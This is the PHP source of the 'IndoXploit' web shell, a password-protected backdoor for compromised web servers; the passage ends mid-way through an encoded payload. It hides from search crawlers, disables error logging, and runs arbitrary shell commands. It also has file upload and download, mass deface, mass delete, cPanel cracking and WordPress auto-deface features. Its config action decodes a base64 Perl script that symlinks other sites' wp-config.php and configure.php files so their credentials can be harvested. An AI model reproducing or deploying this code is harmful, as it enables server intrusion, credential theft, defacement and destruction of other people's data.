IDX Shell Recoded

1. <?php
2. session_start();
3. error_reporting(0);
4. set_time_limit(0);
5. @set_magic_quotes_runtime(0);
6. @clearstatcache();
7. @ini_set('error_log',NULL);
8. @ini_set('log_errors',0);
9. @ini_set('max_execution_time',0);
10. @ini_set('output_buffering',0);
11. @ini_set('display_errors', 0);
12.  
13. $auth_pass = "0030eca98157a85f562c212c0651c415";
14. $color = "#00ff00";
15. $default_action = 'FilesMan';
16. $default_use_ajax = true;
17. $default_charset = 'UTF-8';
18. if(!empty($_SERVER['HTTP_USER_AGENT'])) {
19. $userAgents = array("Googlebot", "Slurp", "MSNBot", "PycURL", "facebookexternalhit", "ia_archiver", "crawler", "Yandex", "Rambler", "Yahoo! Slurp", "YahooSeeker", "bingbot");
20. if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
21. header('HTTP/1.0 404 Not Found');
22. exit;
23. }
24. }
25.  
26. function login_shell() {
27. ?>
28. <html>
29. <head>
30. <title>Access Denied!</title>
31. <style type="text/css">
32. @import url('https://fonts.googleapis.com/css?family=Comfortaa|Lobster+Two|PT+Sans');
33. html {
34. margin: 20px auto;
35. background: #000000;
36. color: green;
37. text-align: center;
38. }
39. header {
40. color: green;
41. margin: 10px auto;
42. }
43. input[type=password] {
44. width: 250px;
45. height: 25px;
46. color: lime;
47. background: #800000;
48. border: 1px solid transparent;
49. padding: 5px;
50. margin-left: 20px;
51. text-align: center;
52. }
53. </style>
54. </head>
55. <center>
56. <br><br><br><br><br><br><br><br><br><br><h1><img src="http://rs894.pbsrc.com/albums/ac144/tifarez/Indonesia.png~c200" border="0" height="50" width="50"><font color="red" face="Lobster Two">IndoXploit Shell</font></h1><br>
57. <form method="post">
58. <input type="password" name="pass">
59. </form>
60. </center>
61. <?php
62. exit;
63. }
64. if(!isset($_SESSION[md5($_SERVER['HTTP_HOST'])]))
65. if( empty($auth_pass) || ( isset($_POST['pass']) && (md5($_POST['pass']) == $auth_pass) ) )
66. $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
67. else
68. login_shell();
69. if(isset($_GET['file']) && ($_GET['file'] != '') && ($_GET['act'] == 'download')) {
70. @ob_clean();
71. $file = $_GET['file'];
72. header('Content-Description: File Transfer');
73. header('Content-Type: application/octet-stream');
74. header('Content-Disposition: attachment; filename="'.basename($file).'"');
75. header('Expires: 0');
76. header('Cache-Control: must-revalidate');
77. header('Pragma: public');
78. header('Content-Length: ' . filesize($file));
79. readfile($file);
80. exit;
81. }
82. ?>
83. <html>
84. <head>
85. <link rel="shortcut icon" type="image/x-icon" href="http://rs894.pbsrc.com/albums/ac144/tifarez/Indonesia.png~c200" />
86. <title>IDX Shell</title>
87. <meta name='author' content='IDX Shell'>
88. <link href="https://fonts.googleapis.com/css?family=Share+Tech+Mono" rel="stylesheet">
89. <link href="https://fonts.googleapis.com/css?family=Kelly+Slab" rel="stylesheet">
90.  
91. <meta charset="UTF-8">
92. <style type='text/css'>
93. @import url('https://fonts.googleapis.com/css?family=Comfortaa|Lobster+Two|PT+Sans');
94. html {
95. background: #000000;
96. color: red;
97. font-family: 'Kelly Slab';
98. font-size: 13px;
99. width: 100%;
100. }
101. li {
102. display: inline;
103. margin: 5px;
104. padding: 5px;
105. }
106. table, th, td {
107. border-collapse:collapse;
108. font-family: Tahoma, Geneva, sans-serif;
109. background: transparent;
110. font-family: 'Share Tech Mono';
111. font-size: 13px;
112. }
113. .table_home, .th_home, .td_home {
114. border: 1px dotted transparent;
115. }
116. th {
117. padding: 10px;
118. }
119. a {
120. color: yellow;
121. text-decoration: none;
122. }
123. a:hover {
124. color: yellow;
125. text-decoration: none;
126. text-shadow:0px 0px 3px #ffffff
127. }
128. b {
129. color: gold;
130. }
131. input[type=text], input[type=password],input[type=submit] {
132. background: #800000;
133. color: #ffffff;
134. border: 1px solid #ffffff;
135. margin: 5px auto;
136. padding-left: 5px;
137. font-family: 'PT sans';
138. font-size: 13px;
139. }
140. textarea {
141. border: 1px dotted transparent;
142. width: 100%;
143. height: 400px;
144. padding-left: 5px;
145. margin: 15px auto;
146. resize: none;
147. background: #800000;
148. color: #ffffff;
149. font-family: 'PT sans';
150. font-size: 13px;
151. }
152. select {
153. width: 152px;
154. background: #000000;
155. color: lime;
156. border: 1px dotted #000000;
157. margin: 5px auto;
158. padding-left: 5px;
159. font-family: 'PT sans';
160. font-size: 13px;
161. }
162. option:hover {
163. background: lime;
164. color: #000000;
165. }
166. tr:hover{
167. background-color: #800000;
168. text-shadow:0px 0px 20px #ffffff;
169. }
170. </style>
171. </head>
172. <body>
173. <h1><center><img src="http://rs894.pbsrc.com/albums/ac144/tifarez/Indonesia.png~c200" border="0" height="50" width="50"><font color="red" face="Lobster Two">IndoXploit Shell</font></h1></center><h3><center><font color="white" face="PT sans">Indonesia Goes To International!</font></center></h3>
174. </body>
175. <?php
176. function w($dir,$perm) {
177. if(!is_writable($dir)) {
178. return "<font color=red>".$perm."</font>";
179. } else {
180. return "<font color=lime>".$perm."</font>";
181. }
182. }
183. function r($dir,$perm) {
184. if(!is_readable($dir)) {
185. return "<font color=red>".$perm."</font>";
186. } else {
187. return "<font color=lime>".$perm."</font>";
188. }
189. }
190. function exe($cmd) {
191. if(function_exists('system')) {
192. @ob_start();
193. @system($cmd);
194. $buff = @ob_get_contents();
195. @ob_end_clean();
196. return $buff;
197. } elseif(function_exists('exec')) {
198. @exec($cmd,$results);
199. $buff = "";
200. foreach($results as $result) {
201. $buff .= $result;
202. } return $buff;
203. } elseif(function_exists('passthru')) {
204. @ob_start();
205. @passthru($cmd);
206. $buff = @ob_get_contents();
207. @ob_end_clean();
208. return $buff;
209. } elseif(function_exists('shell_exec')) {
210. $buff = @shell_exec($cmd);
211. return $buff;
212. }
213. }
214. function perms($file){
215. $perms = fileperms($file);
216. if (($perms & 0xC000) == 0xC000) {
217. // Socket
218. $info = 's';
219. } elseif (($perms & 0xA000) == 0xA000) {
220. // Symbolic Link
221. $info = 'l';
222. } elseif (($perms & 0x8000) == 0x8000) {
223. // Regular
224. $info = '-';
225. } elseif (($perms & 0x6000) == 0x6000) {
226. // Block special
227. $info = 'b';
228. } elseif (($perms & 0x4000) == 0x4000) {
229. // Directory
230. $info = 'd';
231. } elseif (($perms & 0x2000) == 0x2000) {
232. // Character special
233. $info = 'c';
234. } elseif (($perms & 0x1000) == 0x1000) {
235. // FIFO pipe
236. $info = 'p';
237. } else {
238. // Unknown
239. $info = 'u';
240. }
241. // Owner
242. $info .= (($perms & 0x0100) ? 'r' : '-');
243. $info .= (($perms & 0x0080) ? 'w' : '-');
244. $info .= (($perms & 0x0040) ?
245. (($perms & 0x0800) ? 's' : 'x' ) :
246. (($perms & 0x0800) ? 'S' : '-'));
247. // Group
248. $info .= (($perms & 0x0020) ? 'r' : '-');
249. $info .= (($perms & 0x0010) ? 'w' : '-');
250. $info .= (($perms & 0x0008) ?
251. (($perms & 0x0400) ? 's' : 'x' ) :
252. (($perms & 0x0400) ? 'S' : '-'));
253. // World
254. $info .= (($perms & 0x0004) ? 'r' : '-');
255. $info .= (($perms & 0x0002) ? 'w' : '-');
256. $info .= (($perms & 0x0001) ?
257. (($perms & 0x0200) ? 't' : 'x' ) :
258. (($perms & 0x0200) ? 'T' : '-'));
259. return $info;
260. }
261. function hdd($s) {
262. if($s >= 1073741824)
263. return sprintf('%1.2f',$s / 1073741824 ).' GB';
264. elseif($s >= 1048576)
265. return sprintf('%1.2f',$s / 1048576 ) .' MB';
266. elseif($s >= 1024)
267. return sprintf('%1.2f',$s / 1024 ) .' KB';
268. else
269. return $s .' B';
270. }
271. function ambilKata($param, $kata1, $kata2){
272. if(strpos($param, $kata1) === FALSE) return FALSE;
273. if(strpos($param, $kata2) === FALSE) return FALSE;
274. $start = strpos($param, $kata1) + strlen($kata1);
275. $end = strpos($param, $kata2, $start);
276. $return = substr($param, $start, $end - $start);
277. return $return;
278. }
279. function getsource($url) {
280. $curl = curl_init($url);
281. curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
282. curl_setopt($curl, CURLOPT_FOLLOWLOCATION, true);
283. curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false);
284. curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, false);
285. $content = curl_exec($curl);
286. curl_close($curl);
287. return $content;
288. }
289. function bing($dork) {
290. $npage = 1;
291. $npages = 30000;
292. $allLinks = array();
293. $lll = array();
294. while($npage <= $npages) {
295. $x = getsource("http://www.bing.com/search?q=".$dork."&first=".$npage);
296. if($x) {
297. preg_match_all('#<h2><a href="(.*?)" h="ID#', $x, $findlink);
298. foreach ($findlink[1] as $fl) array_push($allLinks, $fl);
299. $npage = $npage + 10;
300. if (preg_match("(first=" . $npage . "&amp)siU", $x, $linksuiv) == 0) break;
301. } else break;
302. }
303. $URLs = array();
304. foreach($allLinks as $url){
305. $exp = explode("/", $url);
306. $URLs[] = $exp[2];
307. }
308. $array = array_filter($URLs);
309. $array = array_unique($array);
310. $sss = count(array_unique($array));
311. foreach($array as $domain) {
312. echo $domain."\n";
313. }
314. }
315. function reverse($url) {
316. $ch = curl_init("http://domains.yougetsignal.com/domains.php");
317. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1 );
318. curl_setopt($ch, CURLOPT_POSTFIELDS, "remoteAddress=$url&ket=");
319. curl_setopt($ch, CURLOPT_HEADER, 0);
320. curl_setopt($ch, CURLOPT_POST, 1);
321. $resp = curl_exec($ch);
322. $resp = str_replace("[","", str_replace("]","", str_replace("\"\"","", str_replace(", ,",",", str_replace("{","", str_replace("{","", str_replace("}","", str_replace(", ",",", str_replace(", ",",", str_replace("'","", str_replace("'","", str_replace(":",",", str_replace('"','', $resp ) ) ) ) ) ) ) ) ) ))));
323. $array = explode(",,", $resp);
324. unset($array[0]);
325. foreach($array as $lnk) {
326. $lnk = "http://$lnk";
327. $lnk = str_replace(",", "", $lnk);
328. echo $lnk."\n";
329. ob_flush();
330. flush();
331. }
332. curl_close($ch);
333. }
334. if(get_magic_quotes_gpc()) {
335. function idx_ss($array) {
336. return is_array($array) ? array_map('idx_ss', $array) : stripslashes($array);
337. }
338. $_POST = idx_ss($_POST);
339. $_COOKIE = idx_ss($_COOKIE);
340. }
341.  
342. if(isset($_GET['dir'])) {
343. $dir = $_GET['dir'];
344. chdir($dir);
345. } else {
346. $dir = getcwd();
347. }
348. $kernel = php_uname();
349. $ip = gethostbyname($_SERVER['HTTP_HOST']);
350. $dir = str_replace("\\","/",$dir);
351. $scdir = explode("/", $dir);
352. $freespace = hdd(disk_free_space("/"));
353. $total = hdd(disk_total_space("/"));
354. $used = $total - $freespace;
355. $sm = (@ini_get(strtolower("safe_mode")) == 'on') ? "<font color=red>NYALA</font>" : "<font color=lime>MATI</font>";
356. $ds = @ini_get("disable_functions");
357. $mysql = (function_exists('mysql_connect')) ? "<font color=lime>NYALA</font>" : "<font color=red>MATI</font>";
358. $curl = (function_exists('curl_version')) ? "<font color=lime>NYALA</font>" : "<font color=red>MATI</font>";
359. $wget = (exe('wget --help')) ? "<font color=lime>NYALA</font>" : "<font color=red>MATI</font>";
360. $perl = (exe('perl --help')) ? "<font color=lime>NYALA</font>" : "<font color=red>MATI</font>";
361. $python = (exe('python --help')) ? "<font color=lime>NYALA</font>" : "<font color=red>MATI</font>";
362. $show_ds = (!empty($ds)) ? "<font color=red>$ds</font>" : "<font color=lime>NONE</font>";
363. if(!function_exists('posix_getegid')) {
364. $user = @get_current_user();
365. $uid = @getmyuid();
366. $gid = @getmygid();
367. $group = "?";
368. } else {
369. $uid = @posix_getpwuid(posix_geteuid());
370. $gid = @posix_getgrgid(posix_getegid());
371. $user = $uid['name'];
372. $uid = $uid['uid'];
373. $group = $gid['name'];
374. $gid = $gid['gid'];
375. }
376. echo "<font color=yellow>[System:</font> <font color=lime>".$kernel."]</font><br>";
377. echo "<font color=yellow>[User:</font> <font color=lime>".$user."]</font> (".$uid.") [Group: <font color=lime>".$group."]</font> (".$gid.")<br>";
378. echo "<font color=yellow>[Server IP:</font> <font color=lime>".$ip."]</font> | [Your IP: <font color=lime>".$_SERVER['REMOTE_ADDR']."]</font><br>";
379. echo "<font color=yellow>[HDD:</font> <font color=lime>$used</font> / <font color=lime>$total]</font> ( [Free: <font color=lime>$freespace]</font> )<br>";
380. echo "<font color=yellow>[Safe Mode:</font> $sm]<br>";
381. echo "<font color=yellow>[Disable Functions:</font> $show_ds]<br>";
382. echo "<font color=yellow>[MySQL:</font> $mysql] | <font color=yellow>[Perl:</font> $perl] | <font color=yellow>[Python:</font> $python] | <font color=yellow>[WGET:</font> $wget] | <font color=yellow>[CURL:</font> $curl] <br>";
383. echo "<font color=yellow>[Kamu Berada Di Directory Ini = </font>";
384. foreach($scdir as $c_dir => $cdir) {
385. echo "<a href='?dir=";
386. for($i = 0; $i <= $c_dir; $i++) {
387. echo $scdir[$i];
388. if($i != $c_dir) {
389. echo "/";
390. }
391. }
392. echo "'>$cdir</a>/";
393. }
394. echo "&nbsp;&nbsp;[ ".w($dir, perms($dir))." ]";
395. echo '
396. <form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">
397. <input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
398. if( $_POST['_upl'] == "Upload" ) {
399. if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Upload Sukses!!!<b><br><br>'; }
400. else { echo '<b>Gagal Upload!!!</b><br><br>'; }
401. }
402. echo "<hr>";
403. echo "<center>";
404. echo "<ul>";
405. echo "<li>[ <a href='?'>Home</a> ]</li>";
406. echo "<li>[ <a href='?dir=$dir&do=sym404'>Sym404 Bypass</a> ]</li>";
407. echo "<li>[ <a href='?dir=$dir&do=cmd'>Command</a> ]</li>";
408. echo "<li>[ <a href='?dir=$dir&do=mass_deface'>Mass Deface</a> ]</li>";
409. echo "<li>[ <a href='?dir=$dir&do=mass_delete'>Mass Delete</a> ]</li>";
410. echo "<li>[ <a href='?dir=$dir&do=config'>Config</a> ]</li>";
411. echo "<li>[ <a href='?dir=$dir&do=jumping'>Jumping</a> ]</li>";
412. echo "<li>[ <a href='?dir=$dir&do=cpanel'>CPanel Crack</a> ]</li>";
413. echo "<li>[ <a href='?dir=$dir&do=smtp'>SMTP Grabber</a> ]</li>";
414. echo "<li>[ <a href='?dir=$dir&do=zoneh'>Zone-H Mirror</a> ]</li>";
415. echo "<li>[ <a href='?dir=$dir&do=csrf'>CSRF Uploader</a> ]</li>";
416. echo "<li>[ <a href='?dir=$dir&do=cgi'>CGI Telnet</a> ]</li>";
417. echo "<li>[ <a href='?dir=$dir&do=network'>Network</a> ]</li>";
418. echo "<li>[ <a href='?dir=$dir&do=hash_en'>MD5 Encrypter</a> ]</li>";
419. echo "<li>[ <a href='?dir=$dir&do=adminer'>Adminer</a> ]</li><br>";
420. echo "<li>[ <a href='?dir=$dir&do=fake_root'>Fake Root</a> ]</li>";
421. echo "<li>[ <a href='?dir=$dir&do=auto_edit_user'>Auto Edit User</a> ]</li>";
422. echo "<li>[ <a href='?dir=$dir&do=auto_wp'>Auto Edit Title WordPress</a> ]</li>";
423. echo "<li>[ <a href='?dir=$dir&do=auto_dwp'>WordPress Auto Deface</a> ]</li>";
424. echo "<li>[ <a href='?dir=$dir&do=auto_dwp2'>WordPress Auto Deface V.2</a> ]</li>";
425. echo "<li>[ <a href='?dir=$dir&do=cpftp_auto'>CPanel/FTP Auto Deface</a> ]</li>";
426. echo "<li>[ <a href='?dir=$dir&do=krdp_shell'>K-RDP Shell</a> ]</li>";
427. echo "<li>[ <a style='color: red;' href='?logout=true'>Logout</a> ]</li>";
428. echo "</ul>";
429. echo "</center>";
430. echo "<hr>";
431. if($_GET['logout'] == true) {
432. unset($_SESSION[md5($_SERVER['HTTP_HOST'])]);
433. echo "<script>window.location='?';</script>";
434. } elseif($_GET['do'] == 'cmd') {
435. echo "<form method='post'>
436. <font style='text-decoration: underline;'>".$user."@".$ip.": ~ $ </font>
437. <input type='text' size='30' height='10' name='cmd'><input type='submit' name='do_cmd' value='>>'>
438. </form>";
439. if($_POST['do_cmd']) {
440. echo "<pre>".exe($_POST['cmd'])."</pre>";
441. }
442. } elseif($_GET['do'] == 'mass_deface') {
443. function sabun_massal($dir,$namafile,$isi_script) {
444. if(is_writable($dir)) {
445. $dira = scandir($dir);
446. foreach($dira as $dirb) {
447. $dirc = "$dir/$dirb";
448. $lokasi = $dirc.'/'.$namafile;
449. if($dirb === '.') {
450. file_put_contents($lokasi, $isi_script);
451. } elseif($dirb === '..') {
452. file_put_contents($lokasi, $isi_script);
453. } else {
454. if(is_dir($dirc)) {
455. if(is_writable($dirc)) {
456. echo "[<font color=lime>DONE</font>] $lokasi<br>";
457. file_put_contents($lokasi, $isi_script);
458. $idx = sabun_massal($dirc,$namafile,$isi_script);
459. }
460. }
461. }
462. }
463. }
464. }
465. function sabun_biasa($dir,$namafile,$isi_script) {
466. if(is_writable($dir)) {
467. $dira = scandir($dir);
468. foreach($dira as $dirb) {
469. $dirc = "$dir/$dirb";
470. $lokasi = $dirc.'/'.$namafile;
471. if($dirb === '.') {
472. file_put_contents($lokasi, $isi_script);
473. } elseif($dirb === '..') {
474. file_put_contents($lokasi, $isi_script);
475. } else {
476. if(is_dir($dirc)) {
477. if(is_writable($dirc)) {
478. echo "[<font color=lime>DONE</font>] $dirb/$namafile<br>";
479. file_put_contents($lokasi, $isi_script);
480. }
481. }
482. }
483. }
484. }
485. }
486. if($_POST['start']) {
487. if($_POST['tipe_sabun'] == 'mahal') {
488. echo "<div style='margin: 5px auto; padding: 5px'>";
489. sabun_massal($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
490. echo "</div>";
491. } elseif($_POST['tipe_sabun'] == 'murah') {
492. echo "<div style='margin: 5px auto; padding: 5px'>";
493. sabun_biasa($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
494. echo "</div>";
495. }
496. } else {
497. echo "<center>";
498. echo "<form method='post'>
499. <font style='text-decoration: underline;'>Tipe Sabun:</font><br>
500. <input type='radio' name='tipe_sabun' value='murah' checked>Biasa<input type='radio' name='tipe_sabun' value='mahal'>Massal<br>
501. <font style='text-decoration: underline;'>Folder:</font><br>
502. <input type='text' name='d_dir' value='$dir' style='width: 450px;' height='10'><br>
503. <font style='text-decoration: underline;'>Filename:</font><br>
504. <input type='text' name='d_file' value='index.php' style='width: 450px;' height='10'><br>
505. <font style='text-decoration: underline;'>Index File:</font><br>
506. <textarea name='script' style='width: 450px; height: 200px;'>Hacked by IndoXploit</textarea><br>
507. <input type='submit' name='start' value='Mass Deface' style='width: 450px;'>
508. </form></center>";
509. }
510. } elseif($_GET['do'] == 'mass_delete') {
511. function hapus_massal($dir,$namafile) {
512. if(is_writable($dir)) {
513. $dira = scandir($dir);
514. foreach($dira as $dirb) {
515. $dirc = "$dir/$dirb";
516. $lokasi = $dirc.'/'.$namafile;
517. if($dirb === '.') {
518. if(file_exists("$dir/$namafile")) {
519. unlink("$dir/$namafile");
520. }
521. } elseif($dirb === '..') {
522. if(file_exists("".dirname($dir)."/$namafile")) {
523. unlink("".dirname($dir)."/$namafile");
524. }
525. } else {
526. if(is_dir($dirc)) {
527. if(is_writable($dirc)) {
528. if(file_exists($lokasi)) {
529. echo "[<font color=lime>DELETED</font>] $lokasi<br>";
530. unlink($lokasi);
531. $idx = hapus_massal($dirc,$namafile);
532. }
533. }
534. }
535. }
536. }
537. }
538. }
539. if($_POST['start']) {
540. echo "<div style='margin: 5px auto; padding: 5px'>";
541. hapus_massal($_POST['d_dir'], $_POST['d_file']);
542. echo "</div>";
543. } else {
544. echo "<center>";
545. echo "<form method='post'>
546. <font style='text-decoration: underline;'>Folder:</font><br>
547. <input type='text' name='d_dir' value='$dir' style='width: 450px;' height='10'><br>
548. <font style='text-decoration: underline;'>Filename:</font><br>
549. <input type='text' name='d_file' value='index.php' style='width: 450px;' height='10'><br>
550. <input type='submit' name='start' value='Mass Delete' style='width: 450px;'>
551. </form></center>";
552. }
553. } elseif($_GET['do'] == 'config') {
554. $idx = mkdir("idx_config", 0777);
555. $isi_htc = "Options FollowSymLinks MultiViews Indexes ExecCGI\nRequire None\nSatisfy Any\nAddType application/x-httpd-cgi .cin\nAddHandler cgi-script .cin\nAddHandler cgi-script .cin";
556. $htc = fopen("idx_config/.htaccess","w");
557. fwrite($htc, $isi_htc);
558. fclose($htc);
559. if(preg_match("/vhosts|vhost/", $dir)) {
560. $link_config = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir);
561. $vhost = "IyEvdXNyL2Jpbi9wZXJsIC1JL3Vzci9sb2NhbC9iYW5kbWluDQpvcGVuZGlyKG15ICRkaXIgLCAiL3Zhci93d3cvdmhvc3RzLyIpOw0KZm9yZWFjaChzb3J0IHJlYWRkaXIgJGRpcikgew0KICAgIG15ICRpc0RpciA9IDA7DQogICAgJGlzRGlyID0gMSBpZiAtZCAkXzsNCiRzaXRlc3MgPSAkXzsNCg0KDQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJHNpdGVzcy4nLXNob3AudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvb3MvaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJHNpdGVzcy4nLXNob3Atb3MudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvb3Njb20vaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJHNpdGVzcy4nLW9zY29tLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL29zY29tbWVyY2UvaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJHNpdGVzcy4nLW9zY29tbWVyY2UudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvb3Njb21tZXJjZXMvaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJHNpdGVzcy4nLW9zY29tbWVyY2VzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3Nob3AvaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJHNpdGVzcy4nLXNob3AyLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3Nob3BwaW5nL2luY2x1ZGVzL2NvbmZpZ3VyZS5waHAnLCRzaXRlc3MuJy1zaG9wLXNob3BwaW5nLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3NhbGUvaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJHNpdGVzcy4nLXNhbGUudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvYW1lbWJlci9jb25maWcuaW5jLnBocCcsJHNpdGVzcy4nLWFtZW1iZXIudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY29uZmlnLmluYy5waHAnLCRzaXRlc3MuJy1hbWVtYmVyMi50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9tZW1iZXJzL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictbWVtYmVycy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9jb25maWcucGhwJywkc2l0ZXNzLictNGltYWdlczEudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvZm9ydW0vaW5jbHVkZXMvY29uZmlnLnBocCcsJHNpdGVzcy4nLWZvcnVtLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2ZvcnVtcy9pbmNsdWRlcy9jb25maWcucGhwJywkc2l0ZXNzLictZm9ydW1zLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2FkbWluL2NvbmYucGhwJywkc2l0ZXNzLictNS50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9hZG1pbi9jb25maWcucGhwJywkc2l0ZXNzLictNC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy93cC1jb25maWcucGhwJywkc2l0ZXNzLictV29yZHByZXNzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3dwL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy1Xb3JkcHJlc3MudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvV1Avd3AtY29uZmlnLnBocCcsJHNpdGVzcy4nLVdvcmRwcmVzcy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy93cC9iZXRhL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy1Xb3JkcHJlc3MudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvYmV0YS93cC1jb25maWcucGhwJywkc2l0ZXNzLictV29yZHByZXNzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3ByZXNzL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy13cDEzLXByZXNzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3dvcmRwcmVzcy93cC1jb25maWcucGhwJywkc2l0ZXNzLictd29yZHByZXNzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL1dvcmRwcmVzcy93cC1jb25maWcucGhwJywkc2l0ZXNzLictV29yZHByZXNzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2Jsb2cvd3AtY29uZmlnLnBocCcsJHNpdGVzcy4nLVdvcmRwcmVzcy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy93b3JkcHJlc3MvYmV0YS93cC1jb25maWcucGhwJywkc2l0ZXNzLictV29yZHByZXNzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL25ld3Mvd3AtY29uZmlnLnBocCcsJHNpdGVzcy4nLVdvcmRwcmVzcy1uZXdzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL25ldy93cC1jb25maWcucGhwJywkc2l0ZXNzLictV29yZHByZXNzLW5ldy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9ibG9nL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy1Xb3JkcHJlc3MtYmxvZy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9iZXRhL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy1Xb3JkcHJlc3MtYmV0YS50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9ibG9ncy93cC1jb25maWcucGhwJywkc2l0ZXNzLictV29yZHByZXNzLWJsb2dzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2hvbWUvd3AtY29uZmlnLnBocCcsJHNpdGVzcy4nLVdvcmRwcmVzcy1ob21lLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3Byb3RhbC93cC1jb25maWcucGhwJywkc2l0ZXNzLictV29yZHByZXNzLXByb3RhbC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zaXRlL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy1Xb3JkcHJlc3Mtc2l0ZS50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9tYWluL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy1Xb3JkcHJlc3MtbWFpbi50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy90ZXN0L3dwLWNvbmZpZy5waHAnLCRzaXRlc3M